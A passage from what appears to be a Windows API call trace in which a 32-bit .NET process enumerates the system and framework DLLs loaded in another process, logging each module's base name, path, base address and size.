(cb=0x804) returned 0x55b780 [0146.086] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76a90000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0146.087] CoTaskMemFree (pv=0x55b780) [0146.087] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76cb0000, lpmodinfo=0x23f2a2c, cb=0xc | out: lpmodinfo=0x23f2a2c*(lpBaseOfDll=0x76cb0000, SizeOfImage=0x44000, EntryPoint=0x76cc9d80)) returned 1 [0146.087] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.087] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76cb0000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0146.087] CoTaskMemFree (pv=0x55b780) [0146.087] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.087] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76cb0000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0146.088] CoTaskMemFree (pv=0x55b780) [0146.088] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76c00000, lpmodinfo=0x23f4b84, cb=0xc | out: lpmodinfo=0x23f4b84*(lpBaseOfDll=0x76c00000, SizeOfImage=0xad000, EntryPoint=0x76c14f00)) returned 1 [0146.088] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.088] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76c00000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0146.089] CoTaskMemFree (pv=0x55b780) [0146.089] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.089] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76c00000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0146.089] CoTaskMemFree (pv=0x55b780) [0146.089] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f00000, lpmodinfo=0x23f6c90, cb=0xc | out: lpmodinfo=0x23f6c90*(lpBaseOfDll=0x73f00000, SizeOfImage=0x1e000, EntryPoint=0x73f0b640)) returned 1 [0146.090] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.090] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f00000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0146.090] CoTaskMemFree (pv=0x55b780) [0146.090] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.090] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f00000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0146.090] CoTaskMemFree (pv=0x55b780) [0146.090] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73ef0000, lpmodinfo=0x23f8d9c, cb=0xc | out: lpmodinfo=0x23f8d9c*(lpBaseOfDll=0x73ef0000, SizeOfImage=0xa000, EntryPoint=0x73ef2a00)) returned 1 [0146.091] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.091] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73ef0000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0146.091] CoTaskMemFree (pv=0x55b780) [0146.091] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.091] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73ef0000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0146.091] CoTaskMemFree (pv=0x55b780) [0146.091] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76840000, lpmodinfo=0x23faeb0, cb=0xc | out: lpmodinfo=0x23faeb0*(lpBaseOfDll=0x76840000, SizeOfImage=0x58000, EntryPoint=0x768825c0)) returned 1 [0146.092] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.092] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76840000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0146.092] CoTaskMemFree (pv=0x55b780) [0146.092] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.092] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76840000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0146.093] CoTaskMemFree (pv=0x55b780) [0146.093] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6c430000, lpmodinfo=0x23fcfe4, cb=0xc | out: lpmodinfo=0x23fcfe4*(lpBaseOfDll=0x6c430000, SizeOfImage=0x7d000, EntryPoint=0x6c440db0)) returned 1 [0146.093] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.093] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6c430000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0146.094] CoTaskMemFree (pv=0x55b780) [0146.094] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.094] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6c430000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0146.094] CoTaskMemFree (pv=0x55b780) [0146.094] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76d00000, lpmodinfo=0x23ff12c, cb=0xc | out: lpmodinfo=0x23ff12c*(lpBaseOfDll=0x76d00000, SizeOfImage=0x45000, EntryPoint=0x76d1de90)) returned 1 [0146.095] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.095] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76d00000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0146.095] CoTaskMemFree (pv=0x55b780) [0146.095] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.095] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76d00000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0146.096] CoTaskMemFree (pv=0x55b780) [0146.096] GetModuleInformation (in: hProcess=0x2a0, hModule=0x762b0000, lpmodinfo=0x2401238, cb=0xc | out: lpmodinfo=0x2401238*(lpBaseOfDll=0x762b0000, SizeOfImage=0x1bd000, EntryPoint=0x76392a10)) returned 1 [0146.096] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.096] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x762b0000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0146.096] CoTaskMemFree (pv=0x55b780) [0146.096] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.096] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x762b0000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0146.097] CoTaskMemFree (pv=0x55b780) [0146.097] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74ab0000, lpmodinfo=0x2403344, cb=0xc | out: lpmodinfo=0x2403344*(lpBaseOfDll=0x74ab0000, SizeOfImage=0x14f000, EntryPoint=0x74b66820)) returned 1 [0146.097] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.097] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74ab0000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0146.098] CoTaskMemFree (pv=0x55b780) [0146.098] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.098] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74ab0000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0146.098] CoTaskMemFree (pv=0x55b780) [0146.098] GetModuleInformation (in: hProcess=0x2a0, hModule=0x743d0000, lpmodinfo=0x24054d4, cb=0xc | out: lpmodinfo=0x24054d4*(lpBaseOfDll=0x743d0000, SizeOfImage=0x147000, EntryPoint=0x743e1cf0)) returned 1 [0146.099] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.099] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x743d0000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0146.099] CoTaskMemFree (pv=0x55b780) [0146.099] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.099] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x743d0000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0146.100] CoTaskMemFree (pv=0x55b780) [0146.100] GetModuleInformation (in: hProcess=0x2a0, hModule=0x741b0000, lpmodinfo=0x24075e0, cb=0xc | out: lpmodinfo=0x24075e0*(lpBaseOfDll=0x741b0000, SizeOfImage=0x2b000, EntryPoint=0x741b5680)) returned 1 [0146.100] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.100] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x741b0000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0146.101] CoTaskMemFree (pv=0x55b780) [0146.101] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.101] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x741b0000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0146.101] CoTaskMemFree (pv=0x55b780) [0146.101] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76d50000, lpmodinfo=0x24096e4, cb=0xc | out: lpmodinfo=0x24096e4*(lpBaseOfDll=0x76d50000, SizeOfImage=0xc000, EntryPoint=0x76d53930)) returned 1 [0146.102] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.102] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76d50000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0146.102] CoTaskMemFree (pv=0x55b780) [0146.102] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.102] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76d50000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0146.103] CoTaskMemFree (pv=0x55b780) [0146.103] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f840000, lpmodinfo=0x240b810, cb=0xc | out: lpmodinfo=0x240b810*(lpBaseOfDll=0x6f840000, SizeOfImage=0x8000, EntryPoint=0x6f8417b0)) returned 1 [0146.103] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.103] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f840000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0146.109] CoTaskMemFree (pv=0x55b780) [0146.109] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.109] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f840000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0146.110] CoTaskMemFree (pv=0x55b780) [0146.110] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69370000, lpmodinfo=0x240d91c, cb=0xc | out: lpmodinfo=0x240d91c*(lpBaseOfDll=0x69370000, SizeOfImage=0x6e1000, EntryPoint=0x6939cd70)) returned 1 [0146.110] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.110] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69370000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0146.111] CoTaskMemFree (pv=0x55b780) [0146.111] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.111] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69370000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0146.111] CoTaskMemFree (pv=0x55b780) [0146.111] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a880000, lpmodinfo=0x240fa4c, cb=0xc | out: lpmodinfo=0x240fa4c*(lpBaseOfDll=0x6a880000, SizeOfImage=0xf5000, EntryPoint=0x6a8d4160)) returned 1 [0146.112] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.112] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a880000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0146.112] CoTaskMemFree (pv=0x55b780) [0146.112] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.112] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a880000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0146.113] CoTaskMemFree (pv=0x55b780) [0146.113] GetModuleInformation (in: hProcess=0x2a0, hModule=0x680b0000, lpmodinfo=0x2411b80, cb=0xc | out: lpmodinfo=0x2411b80*(lpBaseOfDll=0x680b0000, SizeOfImage=0x12b2000, EntryPoint=0x0)) returned 1 [0146.113] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.113] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x680b0000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0146.114] CoTaskMemFree (pv=0x55b780) [0146.114] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.114] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x680b0000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll")) returned 0x68 [0146.115] CoTaskMemFree (pv=0x55b780) [0146.115] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74dc0000, lpmodinfo=0x2413d28, cb=0xc | out: lpmodinfo=0x2413d28*(lpBaseOfDll=0x74dc0000, SizeOfImage=0xeb000, EntryPoint=0x74dfd650)) returned 1 [0146.115] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.115] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74dc0000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0146.116] CoTaskMemFree (pv=0x55b780) [0146.116] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.116] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74dc0000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0146.116] CoTaskMemFree (pv=0x55b780) [0146.116] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73dd0000, lpmodinfo=0x2415e2c, cb=0xc | out: lpmodinfo=0x2415e2c*(lpBaseOfDll=0x73dd0000, SizeOfImage=0x75000, EntryPoint=0x73e09a60)) returned 1 [0146.117] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.117] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73dd0000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="uxtheme.dll") returned 0xb [0146.118] CoTaskMemFree (pv=0x55b780) [0146.118] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.118] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73dd0000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")) returned 0x1f [0146.118] CoTaskMemFree (pv=0x55b780) [0146.118] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69e40000, lpmodinfo=0x2417f38, cb=0xc | out: lpmodinfo=0x2417f38*(lpBaseOfDll=0x69e40000, SizeOfImage=0x80000, EntryPoint=0x69e41180)) returned 1 [0146.119] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.119] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69e40000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0146.120] CoTaskMemFree (pv=0x55b780) [0146.120] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.120] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69e40000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0146.120] CoTaskMemFree (pv=0x55b780) [0146.121] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76680000, lpmodinfo=0x241a078, cb=0xc | out: lpmodinfo=0x241a078*(lpBaseOfDll=0x76680000, SizeOfImage=0x92000, EntryPoint=0x766b8cf0)) returned 1 [0146.121] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.121] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76680000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0146.122] CoTaskMemFree (pv=0x55b780) [0146.122] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.122] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76680000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0146.122] CoTaskMemFree (pv=0x55b780) [0146.122] GetModuleInformation (in: hProcess=0x2a0, hModule=0x676e0000, lpmodinfo=0x241c18c, cb=0xc | out: lpmodinfo=0x241c18c*(lpBaseOfDll=0x676e0000, SizeOfImage=0x9cc000, EntryPoint=0x0)) returned 1 [0146.123] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.123] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x676e0000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0146.124] CoTaskMemFree (pv=0x55b780) [0146.124] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.124] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x676e0000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll")) returned 0x64 [0146.125] CoTaskMemFree (pv=0x55b780) [0146.125] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69c40000, lpmodinfo=0x241e328, cb=0xc | out: lpmodinfo=0x241e328*(lpBaseOfDll=0x69c40000, SizeOfImage=0x18f000, EntryPoint=0x0)) returned 1 [0146.125] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.125] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69c40000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="System.Drawing.ni.dll") returned 0x15 [0146.126] CoTaskMemFree (pv=0x55b780) [0146.126] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.126] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69c40000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\system.drawing.ni.dll")) returned 0x74 [0146.127] CoTaskMemFree (pv=0x55b780) [0146.127] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66a70000, lpmodinfo=0x24204f4, cb=0xc | out: lpmodinfo=0x24204f4*(lpBaseOfDll=0x66a70000, SizeOfImage=0xc67000, EntryPoint=0x0)) returned 1 [0146.127] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.127] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66a70000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="System.Windows.Forms.ni.dll") returned 0x1b [0146.128] CoTaskMemFree (pv=0x55b780) [0146.128] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.128] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66a70000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\system.windows.forms.ni.dll")) returned 0x80 [0146.129] CoTaskMemFree (pv=0x55b780) [0146.129] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6b4d0000, lpmodinfo=0x24226e4, cb=0xc | out: lpmodinfo=0x24226e4*(lpBaseOfDll=0x6b4d0000, SizeOfImage=0x92000, EntryPoint=0x6b4ddd60)) returned 1 [0146.129] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.129] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6b4d0000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0146.130] CoTaskMemFree (pv=0x55b780) [0146.130] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.130] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6b4d0000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")) returned 0x78 [0146.131] CoTaskMemFree (pv=0x55b780) [0146.131] GetModuleInformation (in: hProcess=0x2a0, hModule=0x72d30000, lpmodinfo=0x24248a8, cb=0xc | out: lpmodinfo=0x24248a8*(lpBaseOfDll=0x72d30000, SizeOfImage=0x20f000, EntryPoint=0x72ddb0a0)) returned 1 [0146.132] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.132] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x72d30000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0146.132] CoTaskMemFree (pv=0x55b780) [0146.132] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.132] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x72d30000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll")) returned 0x77 [0146.133] CoTaskMemFree (pv=0x55b780) [0146.133] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73db0000, lpmodinfo=0x2426b74, cb=0xc | out: lpmodinfo=0x2426b74*(lpBaseOfDll=0x73db0000, SizeOfImage=0x1d000, EntryPoint=0x73db3b10)) returned 1 [0146.134] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.134] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73db0000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0146.135] CoTaskMemFree (pv=0x55b780) [0146.135] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.135] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73db0000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")) returned 0x1e [0146.136] CoTaskMemFree (pv=0x55b780) [0146.136] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66320000, lpmodinfo=0x2428c80, cb=0xc | out: lpmodinfo=0x2428c80*(lpBaseOfDll=0x66320000, SizeOfImage=0x721000, EntryPoint=0x0)) returned 1 [0146.136] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.136] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66320000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0146.138] CoTaskMemFree (pv=0x55b780) [0146.138] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.138] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66320000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll")) returned 0x6e [0146.139] CoTaskMemFree (pv=0x55b780) [0146.139] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66220000, lpmodinfo=0x242ae3c, cb=0xc | out: lpmodinfo=0x242ae3c*(lpBaseOfDll=0x66220000, SizeOfImage=0xf1000, EntryPoint=0x0)) returned 1 [0146.140] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.140] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66220000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="System.Configuration.ni.dll") returned 0x1b [0146.140] CoTaskMemFree (pv=0x55b780) [0146.141] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.141] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66220000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\fe4b221b4109f0c78f57a792500699b5\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\fe4b221b4109f0c78f57a792500699b5\\system.configuration.ni.dll")) returned 0x80 [0146.142] CoTaskMemFree (pv=0x55b780) [0146.142] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65b00000, lpmodinfo=0x242d02c, cb=0xc | out: lpmodinfo=0x242d02c*(lpBaseOfDll=0x65b00000, SizeOfImage=0x71e000, EntryPoint=0x0)) returned 1 [0146.142] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.142] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65b00000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="System.Xml.ni.dll") returned 0x11 [0146.143] CoTaskMemFree (pv=0x55b780) [0146.143] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.143] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65b00000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\4fbda26d781323081b45526da6e87b35\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\4fbda26d781323081b45526da6e87b35\\system.xml.ni.dll")) returned 0x6c [0146.144] CoTaskMemFree (pv=0x55b780) [0146.144] GetModuleInformation (in: hProcess=0x2a0, hModule=0x764d0000, lpmodinfo=0x242f1e0, cb=0xc | out: lpmodinfo=0x242f1e0*(lpBaseOfDll=0x764d0000, SizeOfImage=0x6000, EntryPoint=0x764d1460)) returned 1 [0146.145] CoTaskMemAlloc (cb=0x804) returned 0x55b780 